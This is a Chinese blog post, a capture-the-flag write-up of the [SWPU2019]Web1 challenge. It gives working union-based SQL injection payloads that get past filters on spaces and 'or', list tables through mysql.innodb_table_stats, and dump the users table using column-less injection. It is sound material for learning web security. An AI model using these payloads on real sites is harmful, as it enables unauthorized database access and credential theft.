[SWPU2019]Web1(无列名注入)

最新推荐文章于 2024-07-24 19:42:49 发布
最新推荐文章于 2024-07-24 19:42:49 发布
阅读量387 收藏 2
点赞数 3
分类专栏: Buuctf刷题篇 文章标签: sql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49656607/article/details/119998219
版权

每天一题,记录学习

题目有几个地方把我坑惨了,哈哈哈
在这里插入图片描述
首先试了一下注册一个admin账号,然后就发现admin已经被注册
在这里插入图片描述
然后就开始试了一堆admin的密码进行爆破,人傻了,考点压根就不在这。

直接注册一个号进去看看
在这里插入图片描述
发布广告的位置又让我想起了 XSS,然后就又上当了
在这里插入图片描述
其实这是一道SQL注入的题目,太坑了吧
在这里插入图片描述
通过简单的测试,过滤了空格,or,and,--+,#等等
因为这里过滤了 or,所以information_schema库自然是也用不成了,所以就用到了无列名的注入方式

具体用法可以看看我的另一篇文章

无列名注入

因为 or 不能用,自然 order by 也没得用了
先试一下字段数,好家伙,22列

-1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
在这里插入图片描述

爆库名

-1'/**/union/**/select/**/1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
在这里插入图片描述

爆表名

-1'/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name=database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
在这里插入图片描述

猜测users的列数

-1'/**/union/**/select/**/1,(select/**/1,2/**/union/**/select*from/**/users),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
在这里插入图片描述
-1'/**/union/**/select/**/1,(select/**/1,2,3/**/union/**/select*from/**/users),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
在这里插入图片描述

users的列数为3列,然后再用无列名注入把内容报出来

-1'/**/union/**/select/**/1,(select/**/group_concat(a,b,c)/**/from/**/(select/**/1/**/as/**/a,2/**/as/**/b,3/**/as/**/c/**/union/**/select/**/*/**/from/**/users)as/**/d),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
在这里插入图片描述

paidx0
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
2016 SWPU CTF web1题目源码
10-31
2016 SWPU CTF web1题目源码
[SWPU2019]Web1--SQL注入列名注入
cainiao17441898的博客
06-11 256
前言大佬wp:无列名注入 解题: 前面正常注册然后有个提交广告的。 一开始还被这个id迷惑了,以为这里有注入口,后面反应过来这只是个创建页面的编码。 进入正题: 这里发现他过滤了许多函数。和–,#;空格也被过滤了,我这里用的/**/来绕过,除了这个(),/!* */也可以 一时间不知道怎么爆出来表名。后面发现mysql会有默认的users表。 所以这里主要用到了无列名注入。 那么首先就是猜user库里面有几列了。 命令: -1'/**/union/**/select/**/1,2,(select/**/1/
BUUCTF-[SWPU2019]Web1(bypass information_schema,无列名注入
qq_44657899的博客
02-25 2019
登录进去后,首先尝试了union注入,但是发现空格被过滤,于是使用/**/绕过。 然后判断列数,但是发现注释符被过滤了,无法使用,于是在SQL语句后加一个单引号闭合后面的语句limit 0,1;'。 由于or被禁用,所以order by也无法使用,改为group by,'/**/group/**/by/**/22,' 最后判断出列数有22列,回显位置为2和3. title='/**/union/...
2016 SWPU CTF web4
10-31
2016 SWPU CTF web4 题目的源码压缩包,压缩包地址是:http://web4.08067.me/web/web.zip,如果服务器关了就只有这里有了
SWPU大数据概论课程报告
01-31
《SWPU大数据概论课程报告》是一份详细探讨大数据领域的学习资料,主要针对对大数据感兴趣的学员或研究人员。作为一份课程报告,它很可能包含了大数据的基本概念、核心技术、应用领域以及未来发展趋势等多个方面的...
swpu前端实验4的实验
04-23
课程:Web前端应用开发实验 项目:jQuery基础应用 成绩: 专业班级: 班内序号: 指导教师:杨云 姓名: 学号: 实验日期: 实验目的及要求: 1. 掌握jQuery页面初始化方法:在网页加载完成后执行特定的操作,如...
[SWPUCTF 2021 新生赛]traditional
03-15
在 SWPUCTF 2021 新生赛的传统题目中,我们看到了一道有趣的密码题目,它与八卦图和二进制数学有着紧密的联系。莱布尼茨是西方的二进制数学的发明者,他受到中国的八卦图的启发,演绎并推论出了数学矩阵,最后创造了...
SQL Server内置的HTAP技术
2401_85789772的博客
07-22 655
假设用户建了一个行存索引和列存索引组合的表,事务插入数据时,会同时插入行存和Delta Store,Delta Store达到100W行阈值后冻结,tuple-mover后台线程会将其中较冷的数据迁移到Main Store,无论是过去的传统数仓,还是现在的大数据技术栈,都存在这个时效性问题。根据数仓场景的特点,SQL Server列存的开销其实可以接受,然后使用类Delta-Main架构也是比较主流的做法,但是到了HTAP的场景,整个数据库需要支撑高并发的查询和更新,列存的开销就会被放大。
如何发现快速发现分析生产问题SQL
qq_34249468的博客
07-22 878
如何发现快速发现分析生产问题SQL
前台文本直接取数据库值doFieldSQL插入SQL
qq_34276316的博客
07-22 356
实现功能:根据选择的车间主任带出角色。
SQLynx数据库管理工具
core815的专栏
07-24 304
SQLynx数据库管理工具
SQL进阶技巧:如何使用差值累计计算思想巧解数学中递归计算问题
石榴姐yyds
07-23 463
本文给出了一种利用SQL语言如何解决数学上递归问题。解决问题的核心在于对差值累计计算的认识,差值累计计算的本质也就是数学中的迭代计算思想在SQL语言中的体现。本文中所描述的问题需要将上一行的计算结果拿出来放到下一行继续叠加,按照直观的思路需要用lag函数去取上一行值但是lag函数获取的往往都是明确的结果值,而这种需要动态计算,于是会走到递归计算的误区中,而需求中所描述的计算方式就是递归的思路,容易产生误解,但仔细推导我们不难发现其实就是每行按照固定的公式算出差值的累加,即 字段X的累计值减去字段Y的累计值等
Dav_笔记10:Using SQL Plan Management之4
Dav_2099的博客
07-23 403
数据库清除超过53周未使用的计划,由该计划的SMB中存储的LAST_EXECUTED时间戳标识。您可以使用计划名称(plan_name)
sqlalchemy使用json_unquote函数的mysql like查询
ithongchou的博客
07-23 1243
为您自己的数据库连接信息,并根据实际表结构修改模型类。函数查询MySQL JSON字段可以通过使用。下面是一个示例,假设有一个名为。请确保替换示例代码中的数据库连接字符串(在SQLAlchemy中使用。的表,其中包含一个名为。
数据库中单表的查询(select)
m0_65347933的博客
07-22 531
数据库单表查询 select
NoSQL之Redis非关系型数据库
2401_83883919的博客
07-22 997
用C语言开发的,开源的,基于内存运行的NoSQL存储结构:键值对(Key/Value KV)数据类型:五大基础数据类型 string(字符串) list(列表) hash(哈希/散列) set(集合/无序集合) zset/sorted set(有序集合)三种特殊的数据类型: HyperLogLogs(基数统计) Bitmaps(位图) geospatial(地理位置)端口号:TCP/6379。
使用sqlalchemy查询mysql的JSON字段
ithongchou的博客
07-23 126
首先,你需要定义一个与表格对应的模型类。
mysql数据库管理(2)
qq_63926306的博客
07-22 1216
使用WHERE 子句,将不满足条件的行过滤掉。以便在别名中包含空格或特殊的字符并区分大小写。使用这种语法一次只能向表中插入一条数据。字符和日期型数据应包含在单引号中。子句,则表中的所有数据都将被更新。也可以在列名和别名之间加入关键字。子句,则表中的全部数据将被删除。按列的默认顺序列出各个列的值。子句中随意列出列名和他们的值。可以对任意数据类型的数据使用。使用缩进提高语句的可读性。子句紧随 FROM 子句。运算来显示在一个区间内的值。记录当前系统的日期和时间。按照ORDER BY。子句指定需要更新的数据。
Qt基础 | QSqlTableModel 的使用
最新发布
zwcslj的博客
07-24 780
Q_OBJECTprivate://数据库连接//数据模型//选择模型//数据映射//自定义数据代理,性别//自定义数据代理,部门//打开数据表//获取字段名称,填充“排序字段”的comboBoxpublic:// QTableView的SelectionModel的行发生了变化,进行处理private::用于加载数据库驱动和建立与数据库之间的连接:用于指定某个数据表 ,作为数据表的数据模型。
[SWPU2019]伟大的侦探
07-27
回答: \[SWPU2019\]伟大的侦探是一个BUUCTF比赛中的题目。根据引用\[1\]和引用\[2\]的内容,我们可以得知在解密过程中得到了一个密码"comEON_YOuAreSOSoS0great",而在解密过程中还发现了一个密码"wllm_is_the_best_team!"。根据引用\[3\]的内容,我们可以得知下载下来的文件是一个压缩包,但是打不开,经过一系列的分析后发现了一个二维码,扫描后显示"flag不在这"。综合这些信息,我们可以推断\[SWPU2019\]伟大的侦探这个题目可能涉及到密码解密和二维码的分析。 #### 引用[.reference_title] - *1* *3* [BUUCTF MISC刷题](https://blog.csdn.net/wow0524/article/details/122448957)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [BUUCTF msic 专题(59)[SWPU2019]伟大的侦探](https://blog.csdn.net/tt_npc/article/details/124389689)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

paidx0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值